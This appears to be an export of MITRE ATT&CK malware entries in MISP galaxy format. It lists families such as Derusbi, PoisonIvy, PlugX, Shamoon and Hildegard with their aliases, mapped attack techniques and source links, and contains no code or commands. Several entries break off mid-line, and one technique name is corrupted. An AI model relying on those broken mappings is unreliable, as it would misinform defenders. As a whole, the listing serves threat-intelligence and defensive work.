The tag is: `misp-galaxy:mitre-malware="WEBC2 - S0109"`

**WEBC2 - S0109 is also known as:**

- WEBC2

**WEBC2 - S0109 has relationships with:**

- similar: `misp-galaxy:tool="WEBC2"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"

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<td><img src="https://attack.mitre.org/software/S0109" alt=" Links" /></td>
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<td><img src="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip" alt=" Links" /></td>
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<td><img src="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" alt=" Links" /></td>
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</table>

**Derusbi - S0021**

[Derusbi](https://attack.mitre.org/software/S0021) is malware used by multiple Chinese APT groups. (Citation: Novetta-Axiom) (Citation: ThreatConnect Anthem) Both Windows and Linux variants have been observed. (Citation: Fidelis Turbo)

The tag is: `misp-galaxy:mitre-malware="Derusbi - S0021"`

**Derusbi - S0021 is also known as:**

- Derusbi
- PHOTO

**Derusbi - S0021 has relationships with:**

- similar: `misp-galaxy:tool="Derusbi"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="Derusbi"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Video Capture - T1125"` with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 4469. Table References

Links
JPIN - S0201

[JPIN](https://attack.mitre.org/software/S0201) is a custom-built backdoor family used by [PLATINUM](https://attack.mitre.org/groups/G0068). Evidence suggests developers of [JPIN](https://attack.mitre.org/software/S0201) and [Dipsind](https://attack.mitre.org/software/S0200) code bases were related in some way. (Citation: Microsoft PLATINUM April 2016)

The tag is: `misp-galaxy:mitre-malware="JPIN - S0201"`

JPIN - S0201 is also known as:

- JPIN

JPIN - S0201 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
PoisonIvy - S0012

[PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups. (Citation: FireEye Poison Ivy) (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Darkmoon Aug 2005)

The tag is: `misp-galaxy:mitre-malware="PoisonIvy - S0012"`

PoisonIvy - S0012 is also known as:

- PoisonIvy
- Poison Ivy
- Darkmoon

PoisonIvy - S0012 has relationships with:

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<td><a href="https://attack.mitre.org/software/S0201">https://attack.mitre.org/software/S0201</a></td>
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<td><a href="https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf">https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf</a></td>
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</table>
• similar: misp-galaxy:rat="PoisonIvy" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:tool="Poison Ivy" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:tool="poisonivy" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="Poison Ivy" with estimative-language:likelihood-probability="likely"
• uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Active Setup - T1547.014" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0012">https://attack.mitre.org/software/S0012</a></td>
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</table>
Nerex - S0210

[Nerex](https://attack.mitre.org/software/S0210) is a Trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Nerex May 2012)

The tag is: `misp-galaxy:mitre-malware="Nerex - S0210"`

Nerex - S0210 is also known as:

- Nerex

Nerex - S0210 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0210">attack.mitre.org/software/S0210</a></td>
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BACKSPACE - S0031

[BACKSPACE](https://attack.mitre.org/software/S0031) is a backdoor used by [APT30](https://attack.mitre.org/groups/G0013) that dates back to at least 2005. (Citation: FireEye APT30)
The tag is: misp-galaxy:mitre-malware="BACKSPACE - S0031"

BACKSPACE - S0031 is also known as:

- BACKSPACE
- Lecna

BACKSPACE - S0031 has relationships with:

- similar: misp-galaxy:tool="Backspace" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0031">https://attack.mitre.org/software/S0031</a></td>
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Dendroid - S0301

[Dendroid](https://attack.mitre.org/software/S0301) is an Android remote access tool (RAT) primarily targeting Western countries. The RAT was available for purchase for $300 and came bundled with a utility to inject the RAT into legitimate applications.(Citation: Lookout-Dendroid)

The tag is: `misp-galaxy:mitre-malware="Dendroid - S0301"`

Dendroid - S0301 is also known as:

- Dendroid

Dendroid - S0301 has relationships with:

- similar: `misp-galaxy:rat="Dendroid"` with `estimative-language:likelihood-probability="likely"`
- uses: `misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="SMS Control - T1582"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1533"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Input Prompt - T1411"` with `estimative-language:likelihood-probability="almost-certain"`

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<td><a href="https://attack.mitre.org/software/S0301">https://attack.mitre.org/software/S0301</a></td>
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<td><a href="https://blog.lookout.com/blog/2014/03/06/dendroid/">https://blog.lookout.com/blog/2014/03/06/dendroid/</a></td>
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</table>
PlugX - S0013

[PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) that uses modular plugins. It has been used by multiple threat groups. (Citation: Lastline PlugX Analysis) (Citation: FireEye Clandestine Fox Part 2) (Citation: New DragonOK) (Citation: Dell TG-3390)

The tag is: *misp-galaxy:mitre-malware="PlugX - S0013"

PlugX - S0013 is also known as:

- PlugX
- DestroyRAT
- Sogu
- Kaba
- Korplug

PlugX - S0013 has relationships with:

- similar: misp-galaxy:rat="PlugX" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:tool="PlugX" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="PlugX" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-
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Links

https://attack.mitre.org/software/S0013
http://labs.lastline.com/an-analysis-of-plugx
https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html
https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage
Fysbis - S0410

[Fysbis](https://attack.mitre.org/software/S0410) is a Linux-based backdoor used by [APT28](https://attack.mitre.org/groups/G0007) that dates back to at least 2014.(Citation: Fysbis Palo Alto Analysis)

The tag is: misp-galaxy:mitre-malware="Fysbis - S0410"

Fysbis - S0410 is also known as:

- Fysbis

Fysbis - S0410 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
Shamoon - S0140

[Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) and Filerase to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)

The tag is: *misp-galaxy:mitre-malware="Shamoon - S0140"*

Shamoon - S0140 is also known as:

- Shamoon
- Disttrack

Shamoon - S0140 has relationships with:

- similar: *misp-galaxy:tool="Shamoon"* with estimative-language:likelihood-probability="likely"
- uses: *misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124"* with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

Table 4477. Table References

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<td><a href="https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/">https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/</a></td>
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<td><a href="https://www.symantec.com/connect/blogs/shamoon-attacks">https://www.symantec.com/connect/blogs/shamoon-attacks</a></td>
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</tbody>
</table>

**Wiper - S0041**

[Wiper](https://attack.mitre.org/software/S0041) is a family of destructive malware used in March
2013 during breaches of South Korean banks and media companies. (Citation: Dell Wiper)

The tag is: misp-galaxy:mitre-malware="Wiper - S0041"

Wiper - S0041 is also known as:

- Wiper

Wiper - S0041 has relationships with:


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<td><a href="https://attack.mitre.org/software/S0041">https://attack.mitre.org/software/S0041</a></td>
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</table>

**MiniDuke - S0051**

[MiniDuke](https://attack.mitre.org/software/S0051) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. The [MiniDuke](https://attack.mitre.org/software/S0051) toolset consists of multiple downloader and backdoor components. The loader has been used with other [MiniDuke](https://attack.mitre.org/software/S0051) components as well as in conjunction with [CosmicDuke](https://attack.mitre.org/software/S0050) and [PinchDuke](https://attack.mitre.org/software/S0048). (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="MiniDuke - S0051"

MiniDuke - S0051 is also known as:

- MiniDuke

MiniDuke - S0051 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"


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**POSHSPY - S0150**

[POSHSPY](https://attack.mitre.org/software/S0150) is a backdoor that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2015. It appears to be used as a secondary backdoor used if the actors lost access to their primary backdoors. (Citation: FireEye POSHSPY April 2017)

The tag is: `misp-galaxy:mitre-malware="POSHSPY - S0150"

POSHSPY - S0150 is also known as:

- POSHSPY

POSHSPY - S0150 has relationships with:

- similar: `misp-galaxy:malpedia="POSHSPY"` with estimative-language:likelihood-probability="likely"

- uses: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event 2372"
Ixeshe - S0015

[Ixeshe](https://attack.mitre.org/software/S0015) is a malware family that has been used since at least 2009 against targets in East Asia. (Citation: Moran 2013)

The tag is: `misp-galaxy:mitre-malware="Ixeshe - S0015"`

Ixeshe - S0015 is also known as:

- Ixeshe

Ixeshe - S0015 has relationships with:


- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with
PipeMon - S0501

PipeMon - S0501 is a multi-stage modular backdoor used by [Winnti Group](https://attack.mitre.org/groups/G0044). (Citation: ESET PipeMon May 2020)

The tag is: **misp-galaxy:mitre-malware="PipeMon - S0501"**

PipeMon - S0501 is also known as:

- PipeMon

PipeMon - S0501 has relationships with:

- uses: **misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="Shared Modules - T1129"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="Native API - T1106"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"** with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Parent PID Spoofing - T1134.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Print Processors - T1547.012" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0501">https://attack.mitre.org/software/S0501</a></td>
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<tr>
<td><a href="https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/">https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/</a></td>
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**HDoor - S0061**

[HDoor](https://attack.mitre.org/software/S0061) is malware that has been customized and used by the [Naikon](https://attack.mitre.org/groups/G0019) group. (Citation: Baumgartner Naikon 2015)

The tag is: `misp-galaxy:mitre-malware="HDoor - S0061"`

HDoor - S0061 is also known as:

- HDoor
- Custom HDoor

HDoor - S0061 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001"` with `estimative-language:likelihood-probability="almost-certain"`

**Hildegard - S0601**

[Hildegard](https://attack.mitre.org/software/S0601) is malware that targets misconfigured kubelets for initial access and runs cryptocurrency miner operations. The malware was first observed in January 2021. The TeamTNT activity group is believed to be behind [Hildegard](https://attack.mitre.org/software/S0601). (Citation: Unit 42 Hildegard Malware)

The tag is: `misp-galaxy:mitre-malware="Hildegard - S0601"`

Hildegard - S0601 is also known as:

- Hildegard

Hildegard - S0601 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Container Administration Command - T1609" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Cloud Instance Metadata API - T1552.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Container and Resource Discovery - T1613" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Escape to Host - T1611" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0601">https://attack.mitre.org/software/S0601</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/">https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/</a></td>
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**BISCUIT - S0017**

[BISCUIT](https://attack.mitre.org/software/S0017) is a backdoor that has been used by [APT1](https://attack.mitre.org/groups/G0006) since as early as 2007. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-malware="BISCUIT - S0017"

BISCUIT - S0017 is also known as:

- BISCUIT

BISCUIT - S0017 has relationships with:

- similar: misp-galaxy:tool="BISCUIT" with estimative-language:likelihood-probability="likely"

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-
Helminth - S0170

[Helminth](https://attack.mitre.org/software/S0170) is a backdoor that has at least two variants - one written in VBScript and PowerShell that is delivered via a macros in Excel spreadsheets, and one that is a standalone Windows executable. (Citation: Palo Alto OilRig May 2016)

The tag is: *misp-galaxy:mitre-malware="Helminth - S0170"*

Helminth - S0170 is also known as:

- Helminth

Helminth - S0170 has relationships with:

- similar: *misp-galaxy:malpedia="Helminth"* with estimative-language:likelihood-probability="likely"

- uses: *misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"* with estimative-language:likelihood-probability="almost-certain"

- uses: *misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"* with estimative-language:likelihood-probability="almost-certain"


- uses: *misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001"* with estimative-language:likelihood-probability="almost-certain"

- uses: *misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001"* with estimative-language:likelihood-probability="almost-certain"

